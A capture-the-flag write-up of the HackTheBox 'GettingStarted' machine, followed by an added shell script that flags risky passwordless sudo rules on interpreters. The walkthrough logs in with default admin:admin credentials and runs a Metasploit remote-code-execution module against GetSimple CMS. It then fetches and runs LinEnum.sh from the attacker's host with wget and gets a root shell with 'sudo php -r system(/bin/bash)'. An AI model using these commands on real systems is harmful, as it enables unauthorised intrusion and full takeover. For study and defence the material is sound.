2026-05-13
HackTheBox — GettingStarted Writeup
A walkthrough of the GettingStarted machine — covering recon, exploiting a vulnerable CMS, and a sudo misconfiguration for root.
Overview
GettingStarted is a beginner-friendly Linux machine centered around a vulnerable GetSimple CMS installation. Initial access is achieved by exploiting an unauthenticated remote code execution vulnerability in GetSimple CMS 3.3.15 via Metasploit, landing a shell as www-data. Privilege escalation is straightforward — a sudo misconfiguration allows www-data to run the PHP binary as root without a password, which is trivially abused to spawn a root shell.
Reconnaissance
An initial service version scan revealed two open ports:
nmap -sV 10.129.85.202
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
80/tcp open http Apache httpd 2.4.41 (Ubuntu)
Port 80 is the primary attack surface. Navigating to it revealed a default GetSimple CMS installation — unstyled and unmodified, suggesting a poorly maintained deployment.
Directory fuzzing with ffuf was run against the web root:
ffuf -u http://10.129.85.202:80/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Notable results included /admin, /backups, /data, /plugins, and /theme. The /admin redirect was the most interesting, indicating an admin login panel.
Initial Access
Default Credentials
The admin panel at /admin was tested with default credentials admin:admin, which were accepted — granting full administrative access to the CMS. Inside, a file upload interface was visible under the Files tab, and the settings page revealed the CMS version: GetSimple CMS 3.3.15, with an upgrade check failure confirming the installation was outdated and unpatched.
Exploitation
Searching Metasploit for GetSimple returned two relevant modules. The unauthenticated RCE module from 2019 was selected:
use exploit/multi/http/getsimplecms_unauth_code_exec
set RHOSTS 10.129.85.202
set LHOST <tun0 IP>
set LPORT 4444
exploit
The exploit succeeded and returned a shell as www-data. Enumerating /home revealed a user named mrb3n with the user flag sitting in their home directory.
Privilege Escalation
LinEnum was dropped into /tmp and executed to enumerate escalation vectors:
cd /tmp
wget http://<KALI_IP>:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
The output immediately flagged a critical misconfiguration — www-data can run /usr/bin/php as any user with no password:
(ALL : ALL) NOPASSWD: /usr/bin/php
[+] Possible sudo pwnage!
Because the rule places no restriction on arguments, the PHP interpreter can be told to run arbitrary system commands as root, which is equivalent to unrestricted root access. (The same rule is visible without any tooling via sudo -l.) A single one-liner was enough:
sudo php -r "system('/bin/bash');"
whoami
# root
The root flag was in /root/root.txt.
Key Takeaways
Default credentials are still one of the most impactful vulnerabilities out there. The admin panel was fully exposed with admin:admin — no brute forcing needed.
Unpatched CMS software is a real risk. GetSimple 3.3.15 had public exploits available since 2019. An upgrade check failure on the settings page was a dead giveaway.
Interpreter binaries should never get passwordless sudo. PHP, Python, Perl, Ruby — any of these can trivially spawn a shell. If you're doing a pentest or CTF and see one of these in sudo -l, it's game over. GTFOBins is a great reference for these escalation paths.
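As an added example (not part of the original writeup), here is a small POSIX shell triage script for exactly the class of finding above: it reads sudo -l style output and flags every NOPASSWD rule whose binary is an interpreter or other shell-spawner, so the www-data/php rule from this box, and rules like it, stand out immediately. The sample sudo -l text embedded in the script is constructed to mirror the finding (the hostname "target" and the extra systemctl/find/apt rules are assumptions), and the SHELL_SPAWNERS list is a hand-picked subset of the GTFOBins sudo entries, not an exhaustive one.

```shell
#!/bin/sh
# Added example, not from the original writeup: triage `sudo -l` output for
# NOPASSWD rules on binaries that can spawn a shell (the misconfiguration that
# gave root on GettingStarted). All sample data below is constructed.
set -f   # no globbing while word-splitting sudoers command strings

# Binaries that trivially run arbitrary commands when executed as root.
# Hand-picked subset of the GTFOBins "sudo" entries; extend as needed.
SHELL_SPAWNERS="php python python2 python3 perl ruby node lua bash sh dash zsh vim vi nano less more find awk env"

# is_shell_spawner NAME -> exit status 0 if NAME is in SHELL_SPAWNERS.
is_shell_spawner() {
    for s in $SHELL_SPAWNERS; do
        [ "$1" = "$s" ] && return 0
    done
    return 1
}

# flag_sudo_interpreters reads sudo -l style text on stdin and prints one
# "RUNAS<TAB>BINARY" line per NOPASSWD command whose binary is a shell spawner.
flag_sudo_interpreters() {
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;            # rules that still need a password are skipped
        esac
        # Run-as spec is everything before NOPASSWD:, e.g. "(ALL : ALL)".
        runas=$(printf '%s' "${line%%NOPASSWD:*}" | sed 's/^ *//; s/ *$//')
        # Command list is everything after it, e.g. " /usr/bin/php, /usr/bin/find".
        cmds=${line#*NOPASSWD:}
        # A rule may list several comma-separated commands, each with arguments.
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            set -- $cmd               # word-split: $1 is the binary path, the rest its arguments
            [ -n "$1" ] || continue
            if is_shell_spawner "${1##*/}"; then
                printf '%s\t%s\n' "$runas" "$1"
            fi
        done
    done
}

# count_sudo_interpreters prints how many flagged rules the input on stdin contains.
count_sudo_interpreters() {
    flag_sudo_interpreters | wc -l | tr -d ' '
}

# Constructed sudo -l output modelled on the writeup's finding, plus two extra
# rules (assumed, not from the box) to show what is and is not flagged.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/find
    (root) /usr/bin/apt update'

# On a live box:  sudo -l 2>/dev/null | flag_sudo_interpreters
# With the sample above this prints two lines: (ALL : ALL) /usr/bin/php and (root) /usr/bin/find.
printf '%s\n' "$SAMPLE_SUDO_L" | flag_sudo_interpreters
```

The systemctl rule is deliberately left unflagged by the list above even though systemctl has its own GTFOBins entry: the point is that the list is a starting point, and anything that reaches a pager, an editor or an interpreter should be treated the same way as the php rule on this box. On the defensive side the fix is the mirror image: remove the `/usr/bin/php` rule from sudoers entirely, or replace it with a wrapper script that takes no user-controlled arguments.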